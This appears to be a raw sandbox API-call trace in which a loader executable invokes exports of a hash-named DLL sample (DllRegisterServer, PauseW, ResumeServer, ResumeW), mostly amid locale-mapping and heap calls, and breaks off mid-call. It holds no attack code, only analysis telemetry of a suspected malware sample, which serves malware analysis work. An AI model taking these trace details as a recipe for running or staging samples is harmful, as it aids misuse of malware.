dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0069.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0069.152] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0069.152] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0069.152] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0069.152] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0069.152] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0069.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0069.152] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0069.152] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0069.152] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0069.152] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0069.152] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x100) returned 0x5655b0 [0069.152] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7ff626f72300, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0069.152] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1be) returned 0x55dee0 [0069.152] RtlInitializeSListHead (in: ListHead=0x7ff626f72160 | out: ListHead=0x7ff626f72160) [0069.152] GetLastError () returned 0x0 [0069.152] SetLastError (dwErrCode=0x0) [0069.152] GetEnvironmentStringsW () returned 0x5689a0* [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x9cc) returned 0x569380 [0069.153] FreeEnvironmentStringsW (penv=0x5689a0) returned 1 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x118) returned 0x55e6a0 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3e) returned 0x564aa0 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x5c) returned 0x550720 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x62) returned 0x557390 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x78) returned 0x556fc0 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x62) returned 0x556b90 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x28) returned 0x560320 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x48) returned 0x564ff0 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1a) returned 0x5601d0 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3a) returned 0x564550 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x62) returned 0x557250 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2a) returned 0x557040 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x556c00 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1c) returned 0x55fd80 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd2) returned 0x556e70 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x7c) returned 0x55dc10 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3a) returned 0x5645a0 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x90) returned 0x55dca0 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x55fcc0 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x30) returned 0x556f50 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x36) returned 0x557400 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c) returned 0x5643c0 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x52) returned 0x55d9f0 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c) returned 0x565090 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd6) returned 0x55c120 [0069.153] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x550790 [0069.154] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1e) returned 0x55fe10 [0069.154] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2c) returned 0x5572c0 [0069.154] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x54) returned 0x55da50 [0069.154] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x52) returned 0x55dab0 [0069.154] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x560290 [0069.154] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x42) returned 0x5646e0 [0069.154] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2c) returned 0x55c200 [0069.154] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x44) returned 0x564fa0 [0069.154] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x55fe40 [0069.154] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x569380 | out: hHeap=0x550000) returned 1 [0069.154] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1000) returned 0x5689a0 [0069.154] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff626f52580) returned 0x0 [0069.154] GetStartupInfoW (in: lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0069.154] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fel=\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\tmpuglwtn31\" /s" [0069.154] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fel=\"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\tmpuglwtn31\" /s", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x55c490*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0069.155] CoInitializeEx (pvReserved=0x0, dwCoInit=0x6) returned 0x0 [0070.778] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x58) returned 0x55d450 [0070.778] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\tmpuglwtn31" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\tmpuglwtn31"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x14fbc8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0070.779] GetFileType (hFile=0x15c) returned 0x1 [0070.779] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x4000) returned 0x5704d0 [0070.780] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x1000) returned 0x5744e0 [0070.780] ReadFile (in: hFile=0x15c, lpBuffer=0x5744e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14fc98, lpOverlapped=0x0 | out: lpBuffer=0x5744e0*, lpNumberOfBytesRead=0x14fc98*=0x1000, lpOverlapped=0x0) returned 1 [0070.780] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0070.781] GetLastError () returned 0x0 [0070.781] SetLastError (dwErrCode=0x0) [0070.781] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllRegisterServer", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllRegisterServer", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0075.812] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0075.813] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0075.813] GetLastError () returned 0x0 [0075.813] SetLastError (dwErrCode=0x0) [0075.813] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllUnregisterServer", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=DllUnregisterServer", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0077.170] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0077.171] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0077.172] GetLastError () returned 0x0 [0077.172] SetLastError (dwErrCode=0x0) [0077.172] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=PauseW", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=PauseW", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0079.534] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0079.535] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0079.536] GetLastError () returned 0x0 [0079.536] SetLastError (dwErrCode=0x0) [0079.536] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeServer", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeServer", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0082.362] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x5754f0 | out: hHeap=0x550000) returned 1 [0082.362] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x6000) returned 0x5754f0 [0082.362] GetLastError () returned 0x0 [0082.362] SetLastError (dwErrCode=0x0) [0082.362] ShellExecuteExW (in: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeW", lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x14fcf0*(cbSize=0x70, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpParameters="/dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeW", lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, 